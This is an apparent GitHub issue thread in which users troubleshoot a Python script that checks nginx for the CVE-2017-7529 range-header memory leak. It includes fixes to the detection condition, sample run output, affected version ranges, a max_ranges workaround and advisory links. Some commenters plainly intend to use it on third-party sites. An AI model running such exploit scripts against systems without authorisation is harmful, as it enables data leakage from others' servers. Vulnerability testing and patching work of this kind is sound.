Comments (36)
Hi, could you tell me ho to use exploit. Thenks!
from labs.
Hello, I got here while searching for an exploit from a HTB system.
To everyone getting the "Unknown Vulnerable" error - update the code like so, starting at line 32:
httpResponse = send_http_request(url, headers={ 'Range': content_length })
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
log.info("[+] Vulnerable to CVE-2017-7529")
else:
print("[!] Target not vulnerable: HTTP response code: "+str(httpResponse.status_code))
This way, you can actually see the HTTP response code from the target server. If it's not "206" as the logic shows in the exploit test code, if httpResponse.status_code == 206
and "Content-Range" in httpResponse.headers
then the server could already be patched for this vulnerability.
This is probably the case if Ngnix is installed from distribution's package repositories.
I hope that this helps.
~Douglas
from labs.
This python script does work. The url need to be something like http://xxx/yyy/zzz.png, also, you should modify nginx.conf to make the url could be accessed.
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
NOT
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
We need a image file to do this.
The ngx_http_range_header_filter()
check r->allow_range
, which is set when the file acquired is an image.
I compiled nginx 1.14.0 without this patch.
test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png
INFO:__main__:target: http://127.0.0.1/images/demo.png
INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu)
{'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'}
--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-60324/60325
INFO:__main__:[+] Vulnerable to CVE-2017-7529
from labs.
Still curious why the Exploit does not work using a vulnerable nginx-proxy runnning in a docker container.
from labs.
I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115
from labs.
You may want to submit your exploit @ https://www.exploit-db.com/submit/
from labs.
is there solution for this? is it a high risk issue?
from labs.
in line
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
need to be replaced by
httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
After that change, I'm still getting:
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:[?] Unknown Vulnerable
any idea?
from labs.
it appears that nginx/1.12.1 isn't vunerable, but it is on the range 0.5.6 - 1.13.2. can someone verify this please??
from labs.
Copy the code and paste it in notepad of windows or whatever the OS you're using and run it using the following command
python "text file name".py "URL you want to exploit"
ex: python3 test.py http://www."URL".com
from labs.
Hmm, just tried the following:
docker run -d -p 80:80 -v /var/run/docker.sock:/tmp/docker.sock:ro jwilder/nginx-proxy:0.6.0
docker run -d --expose 80 -e VIRTUAL_HOST=foo.bar.com tutum/hello-world
On the host, i added 127.0.0.1 foo.bar.com to /etc/hosts to get foo.bar.com resolved.
curl -L foo.bar.com
outputs "Hello World", so the nginx-proxy is working.
python CVE-2017-7529.py http://foo.bar.com/etc/fstab
outputs
INFO:__main__:target: http://foo.bar.com/etc/fstab
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:[?] Unknown Vulnerable
According to Dockerfile and to the proxy replies the nginx-version is 1.11.10, so the bug should apply, right?
from labs.
Thanks @siochs . I will try to review it.
from labs.
I found a article about this issue and looks like there is a patch for this issue.
Let's wait for the new release with this patch code.
Thank you.
https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7529.html
the following configuration can
be used as a temporary workaround:
max_ranges 1;
http://nginx.org/download/patch.2017.ranges.txt
from labs.
https://access.redhat.com/security/cve/cve-2017-7529 FYI.
from labs.
@siochs Change this;
"Content-Range" in httpResponse.text
to this
"Content-Range" in httpResponse.headers
from labs.
This still does not seem to work and I get the same error as @siochs . Any further suggestions ?
from labs.
It didnt work for me aswell
from labs.
didnt work for me as well..
same output for me also
NFO:main:target: http://www.examlpe.com
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:[?] Unknown Vulnerable
from labs.
what version of python are you all using? sometimes if the version isn't correct python gives out errors.
from labs.
I get the same error as @siochs.any idea how to resolve it
from labs.
INFO:main:[?] Unknown Vulnerable
from labs.
same error here too
INFO:main:status: 200: Server: nginx
INFO:main:status: 200: Server: nginx
INFO:main:[?] Unknown Vulnerable
from labs.
same error here too:
INFO:main:target: https://url.com
INFO:main:status: 200: Server: nginx/1.12.1
INFO:main:status: 200: Server: nginx/1.12.1
INFO:main:[?] Unknown Vulnerable
from labs.
same error here too:
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): site.com INFO:__main__:status: 416: Server: nginx/1.10.3 (Ubuntu) INFO:__main__:[?] Unknown Vulnerable
any idea ?
from labs.
Not vulnerable: 1.13.3+, 1.12.1+
Vulnerable: 0.5.6-1.13.2
from labs.
Change "Content-Range" in httpResponse.text to "Content-Range" in httpResponse.headers
from labs.
I got httpResponse.status_code == 200
Is that OK?
from labs.
the same error .
INFO:__main__:target: (http://www.****.com) INFO:__main__:status: 200: Server: nginx/1.8.0 INFO:__main__:status: 200: Server: nginx/1.8.0 INFO:__main__:[?] Unknown Vulnerable
from labs.
hey i find nginx/1.13.9 cve???
from labs.
in line
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
need to be replaced by
httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
from labs.
from labs.
Hello, We've updated our Nginx to new version 1.15.9 but still getting Vulnerable to CVE-2017-7529 message. Why is it still showing that message instead of Unknown Vulnerable after we updated to latest version. Can anyone give any inputs? Thanks!
INFO:main:status: 200: Server:
INFO:main:status: 206: Server:
INFO:main:[+] Vulnerable to CVE-2017-7529
from labs.
anyone can tell me what is the mean of this responce
i wants to exploit this vul
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:[?] Unknown Vulnerable
from labs.
I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115
The gist ignores snorez advice to look for Content-Range in the response text as opposed to the header.
from labs.
This python script does work. The url need to be something like http://xxx/yyy/zzz.png, also, you should modify nginx.conf to make the url could be accessed.
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
NOT
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
We need a image file to do this.
Thengx_http_range_header_filter()
checkr->allow_range
, which is set when the file acquired is an image.I compiled nginx 1.14.0 without this patch.
test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png INFO:__main__:target: http://127.0.0.1/images/demo.png INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu) INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu) {'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'} --00000000000000000002 Content-Type: image/png Content-Range: bytes -623-60324/60325 INFO:__main__:[+] Vulnerable to CVE-2017-7529
@snorez Will HTTPS not work for reproducing this exploit?
from labs.
Hmm? Interesting .... exploit is not working with vulnerable server
from labs.
Related Issues (20)
- New ajust on xpl HOT 4
- [Add] CVE-2017-8464 HOT 1
- [Question] Fuzzing
- Bug at line number 232 when bindata is finally written into file (Windows Environment) HOT 1
- [Analysis] CVE-2015-2545
- [Exploit] CVE-2017-8570
- [Exploit] CVE-2017-5638 : Apache Struts2 S2_045
- [Exploit] CVE-2017-17411 - Linksys WVBR0 25 Command Injection
- [Links] MS17-010
- [Exploit] CVE-2018-7600 - drupal: Unsanitized requests allow remote attackers to execute arbitrary code HOT 20
- How can I recurrent this vulnerable? HOT 3
- [Exploit] CVE-2018-10562 GPON Home Routers RCE HOT 1
- guide
- p
- Potential false negative with the CVE-2017-5689.py script HOT 3
- CVE-2017-0199 HOT 1
- [CVE-2017-7497] Samba - Remote code execution from a writable share HOT 4
- Apache Struts2 S2-048 HOT 5
- [Analysis] MS17_010
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from labs.